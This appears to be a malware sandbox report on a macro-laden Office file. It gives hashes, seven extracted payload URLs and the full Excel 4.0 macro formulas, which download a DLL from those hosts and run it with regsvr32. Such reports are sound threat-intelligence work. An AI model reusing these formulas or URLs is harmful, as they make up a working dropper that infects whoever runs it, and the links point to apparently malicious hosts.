General
-
Target
967cba123e907af0156ec273b3251fe6a3a806bf8796824430be2a6933bb4f98
-
Size
73KB
-
MD5
d89b1c00aafff3161434c1893cb946c5
-
SHA1
c3f7289563e61f2dda763764740102b75edef190
-
SHA256
967cba123e907af0156ec273b3251fe6a3a806bf8796824430be2a6933bb4f98
-
SHA512
66ba738ed25bf5b2920d264d62a60fa234bfbe11f7c623739a051f04920ecdc3ee9c3c496a1105ea58ece55c1a25410ec9c45fd1c45b9469da145bf140fdd70c
-
SSDEEP
1536:z1iiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVzc:z1iiCtzSmICpH7OZuvZGsMU
Malware Config
Extracted
https://andjello.net/wp-includes/O74XNLzsodp/
http://andrewpharma.com/wp-includes/d8yxEkWRUU/
http://anneferrier.com/logs/Ia7oz193SZbb5N/
http://anaforainc.com/media/tUKKnlCd0QJDxWO/
http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/
http://amdrolls.com/Template/goRpY/
https://www.anagramme.net/admin_files/rOzDUUhjSMh/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andjello.net/wp-includes/O74XNLzsodp/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/d8yxEkWRUU/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anneferrier.com/logs/Ia7oz193SZbb5N/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anaforainc.com/media/tUKKnlCd0QJDxWO/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amdrolls.com/Template/goRpY/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.anagramme.net/admin_files/rOzDUUhjSMh/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
967cba123e907af0156ec273b3251fe6a3a806bf8796824430be2a6933bb4f98